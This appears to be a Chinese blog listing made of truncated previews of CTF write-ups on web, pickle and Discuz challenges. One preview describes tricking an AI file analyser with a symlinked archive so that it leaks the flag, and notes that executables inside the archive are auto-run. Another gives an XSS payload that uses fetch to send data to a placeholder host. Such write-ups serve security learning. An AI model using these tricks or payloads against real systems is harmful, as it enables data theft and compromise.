proxies go过滤器会屏蔽字符串GIVE ME FLAG! go func() { for { n, err := client.Read(buf) if err != nil { if err == io.EOF { slog.Info("Client E

前言 好比赛，圆梦一血和二血 Shopping company系列 1 并不是我写出来的 上传压缩包，后台会解压并读取文件让AI分析 只需要压缩包里面有指向flag的软链接，AI便会返回flag 2 同样方式读取源码，发现压缩包里如果是个executable会被自动运行 #include <cstd

wp边做边写的，有点乱。。。 题目是黑盒，只能先看看功能了 /login登录，题目给了partner的密码[email protected]:partn3r123 登录进去之后的几个路由几乎都是纯静态 有个share功能，会回显json，例如 /partner/share?t

这次出了两个web题，一个ping一个unfinished 其中ping是当半个签到用的，效果也还算符合预期 但是unfinished被非预期麻了 直接document.cookie也能泄露出cookies，不用绕httponly（因为打错字了... 以下是wp ping 这题乍一看神似当初入门we

题目描述 We've discovered a mining pod tunnelling underneath a government facility. Luckily, we've managed to connect to an air-gapped control panel that

本文首发于先知社区（为了赚点积分（ 探究python中pickle，_pickle和pickletools的解析差异问题 前言 来看SEKAI 2025的Discrepancy ### IMPORTS ### from pickle import _Unpickler as py_unpickler

前言 跟着队伍OTSASumuvior ，最终队伍排名为第一名 打了一天这个之后还要去打SEKAI CTF 我曾有一份工作 题目描述中有备份，直接开扫，扫到了www.zip 里面是网站源码，包含一堆配置以及密钥 审计之后发现只要有UC_KEY就可以备份数据库 api/db/dbbak.php <?p

前言 第二天有事，没怎么写 Ruler of the Universe ${String(value).replace('"', "&quot;")} 这地方只转义第一个”,剩下的不会转义,用两个”即可闭合 "" autofocus onfocus="fetch('<https://xx/?'>

前言 先来看一道题（DownUnderCTF 2025），题目只给了一个dockerfile FROM alpine:latest AS flag-builder ​ WORKDIR /build RUN apk add gcc musl-dev RUN cat <<EOF > getflag.c

前言 时间充裕，所以输出还行 整体题目难的很难，简单的又挺简单 Sweet Treat admin/review这里没过滤，只要设置profile为payload <div class="profile-card"> <h4>Username: